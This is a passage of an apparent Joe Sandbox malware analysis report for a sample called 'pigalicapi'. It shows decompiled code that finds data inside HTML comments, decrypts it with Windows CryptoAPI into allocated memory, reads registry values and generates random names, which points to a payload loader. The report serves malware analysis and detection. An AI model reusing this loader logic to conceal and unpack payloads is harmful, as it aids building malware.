                                                                                                                                                                                                                                                                                          • Opcode ID: 8d9e57d56f03e4eb32d98c043259f0602398652354d549f7fd47c3a79d251fb8
                                                                                                                                                                                                                                                                                          • Instruction ID: ab44e85acd7b4189ff70cc03f43a22d4164f04d3a936052a6e0107a988c563e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9e57d56f03e4eb32d98c043259f0602398652354d549f7fd47c3a79d251fb8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D05E7909AA80D7DE04CB2085A5A6B7350FFE7B01F11BD28D00BC7501E7385C08C406
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                                          				char _t63;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v20 = _a4;
                                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                                          					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                                          						_v32 = _t48;
                                                                                                                                                                                                                                                                                          						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                                          						_v28 = _t63;
                                                                                                                                                                                                                                                                                          						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                                          						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                                          						_v24 = _t51;
                                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                                          							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                                          							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                                          							if(_v36 != 0) {
                                                                                                                                                                                                                                                                                          								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                                          								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                          								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                                          								_v40 = _t58;
                                                                                                                                                                                                                                                                                          								if(_v40 > 0) {
                                                                                                                                                                                                                                                                                          									_v13 = 1;
                                                                                                                                                                                                                                                                                          									_v8 = _v40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L16:
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04008256
                                                                                                                                                                                                                                                                                          0x04008261
                                                                                                                                                                                                                                                                                          0x04008285
                                                                                                                                                                                                                                                                                          0x0400828f
                                                                                                                                                                                                                                                                                          0x04008292
                                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                                          0x040082b1
                                                                                                                                                                                                                                                                                          0x040082b6
                                                                                                                                                                                                                                                                                          0x040082b9
                                                                                                                                                                                                                                                                                          0x040082bf
                                                                                                                                                                                                                                                                                          0x040082d6
                                                                                                                                                                                                                                                                                          0x040082db
                                                                                                                                                                                                                                                                                          0x040082de
                                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                                          0x040082e7
                                                                                                                                                                                                                                                                                          0x040082ed
                                                                                                                                                                                                                                                                                          0x040082fb
                                                                                                                                                                                                                                                                                          0x04008306
                                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                                          0x04008318
                                                                                                                                                                                                                                                                                          0x0400832e
                                                                                                                                                                                                                                                                                          0x04008333
                                                                                                                                                                                                                                                                                          0x04008336
                                                                                                                                                                                                                                                                                          0x0400833d
                                                                                                                                                                                                                                                                                          0x0400833f
                                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                                          0x0400834f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400835a
                                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                                          0x0400835f
                                                                                                                                                                                                                                                                                          0x04008365

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                                          • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                          					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                          						_v20 = _a16;
                                                                                                                                                                                                                                                                                          						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                                                                                                          							_v8 = _v20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x0400a406
                                                                                                                                                                                                                                                                                          0x0400a411
                                                                                                                                                                                                                                                                                          0x0400a429
                                                                                                                                                                                                                                                                                          0x0400a439
                                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                                          0x0400a442
                                                                                                                                                                                                                                                                                          0x0400a45c
                                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                                          0x0400a469
                                                                                                                                                                                                                                                                                          0x0400a480
                                                                                                                                                                                                                                                                                          0x0400a488
                                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                                          0x0400a4a0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                          • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v16 = _a8;
                                                                                                                                                                                                                                                                                          					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                                          						_v20 = _t73;
                                                                                                                                                                                                                                                                                          						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          							_v24 = _v12;
                                                                                                                                                                                                                                                                                          							_v28 = _v20;
                                                                                                                                                                                                                                                                                          							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                                          								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                                          								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                                          								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                                          									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                                          									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                                          									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                                          									if(_t91 != 0) {
                                                                                                                                                                                                                                                                                          										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          										 *_a12 = _t93;
                                                                                                                                                                                                                                                                                          										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                                          											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                                          											 *_a16 = _v52;
                                                                                                                                                                                                                                                                                          											_v8 = _v52;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04008096
                                                                                                                                                                                                                                                                                          0x040080a1
                                                                                                                                                                                                                                                                                          0x04008246
                                                                                                                                                                                                                                                                                          0x0400824c
                                                                                                                                                                                                                                                                                          0x040080c5
                                                                                                                                                                                                                                                                                          0x040080c8
                                                                                                                                                                                                                                                                                          0x040080d8
                                                                                                                                                                                                                                                                                          0x040080de
                                                                                                                                                                                                                                                                                          0x040080e5
                                                                                                                                                                                                                                                                                          0x040080fb
                                                                                                                                                                                                                                                                                          0x04008103
                                                                                                                                                                                                                                                                                          0x0400810a
                                                                                                                                                                                                                                                                                          0x04008113
                                                                                                                                                                                                                                                                                          0x04008119
                                                                                                                                                                                                                                                                                          0x0400812d
                                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                                          0x04008140
                                                                                                                                                                                                                                                                                          0x04008149
                                                                                                                                                                                                                                                                                          0x04008162
                                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                                          0x0400817e
                                                                                                                                                                                                                                                                                          0x0400818c
                                                                                                                                                                                                                                                                                          0x0400819e
                                                                                                                                                                                                                                                                                          0x040081b1
                                                                                                                                                                                                                                                                                          0x040081d3
                                                                                                                                                                                                                                                                                          0x040081d8
                                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                                          0x040081f1
                                                                                                                                                                                                                                                                                          0x040081fa
                                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                                          0x0400820e
                                                                                                                                                                                                                                                                                          0x04008219
                                                                                                                                                                                                                                                                                          0x04008227
                                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040080e5

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                          • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                                          					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                                          					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                                          					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                                          						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                                          						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                                          						if(_v56 == 0) {
                                                                                                                                                                                                                                                                                          							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04005938
                                                                                                                                                                                                                                                                                          0x04005943
                                                                                                                                                                                                                                                                                          0x04005971
                                                                                                                                                                                                                                                                                          0x04005986
                                                                                                                                                                                                                                                                                          0x04005988
                                                                                                                                                                                                                                                                                          0x0400598a
                                                                                                                                                                                                                                                                                          0x0400598b
                                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                                          0x040059c6
                                                                                                                                                                                                                                                                                          0x040059d6
                                                                                                                                                                                                                                                                                          0x040059dc
                                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                                          0x040059ee
                                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                                          0x040059fb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                                          • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                          • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v91;
                                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                                          				char _v220;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                          					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                                          					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                                          					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                                          						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                                          						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v40 = _t59;
                                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v220;
